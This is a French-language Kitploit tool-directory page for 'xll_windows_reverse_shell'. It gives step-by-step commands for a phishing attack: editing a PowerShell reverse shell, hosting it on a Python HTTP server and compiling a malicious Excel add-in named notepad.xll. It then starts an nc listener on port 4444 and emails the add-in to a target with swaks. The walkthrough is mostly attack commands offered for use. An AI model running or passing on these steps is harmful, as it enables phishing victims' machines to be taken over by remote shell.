Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
xll_windows_reverse_shell — xll windows reverse shell | Kitploit
Outils/GitHubGitHub/h3x0v3rl0rd/xll_windows_reverse_shell
Outils de PhishingExploitationCommandement et ContrôleIngénierie SocialeRed TeamingDéveloppement de Charges UtilesCheval de Troie d'Accès à Distance
GitHubh3x0v3rl0rd/xll_windows_reverse_shell

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

xll_windows_reverse_shell

xll windows reverse shell

Voir le dépôt
1il y a 1 anPas encore vérifié

xll_windows_reverse_shell

xll windows reverse shell

Sur votre machine Attaquante (Kali) :

root@kitploit:~
git clone https://github.com/n3rdh4x0r/xll_windows_reverse_shell.git
  1. Mettez à jour le revsh.ps1
  2. créez un serveur HTTP Python
root@kitploit:~
python3 -m http.server 9999

Sur votre machine Attaquante (Windows) :

  1. Déplacez notpadXLL.c vers votre machine attaquante Windows et mettez à jour le notpadXLL.c en conséquence.
  2. Ouvrez x64 Native Tools Command Prompt for VS 2022
  3. exécutez la commande ci-dessous pour générer notepad.xll
root@kitploit:~
cl.exe /LD notepadXLL.c /link /out:notepad.xll

image

  1. déplacez ce notepad.xll vers votre machine Kali

Sur votre machine Kali

  1. téléchargez swaks
root@kitploit:~
 curl -O https://jetmore.org/john/code/swaks/files/swaks-20240103.0/swaks
  1. configurez un listener nc
root@kitploit:~
nc -nlvp 4444
  1. Utilisez swaks pour envoyer un e-mail avec notepad.xll en pièce jointe :
root@kitploit:~
./swaks --to [email protected] --from [email protected] --server 10.10.11.21 --port 25 --header "Subject: test" --body "test" --attach @notepad.xll

image

Télécharger l’outil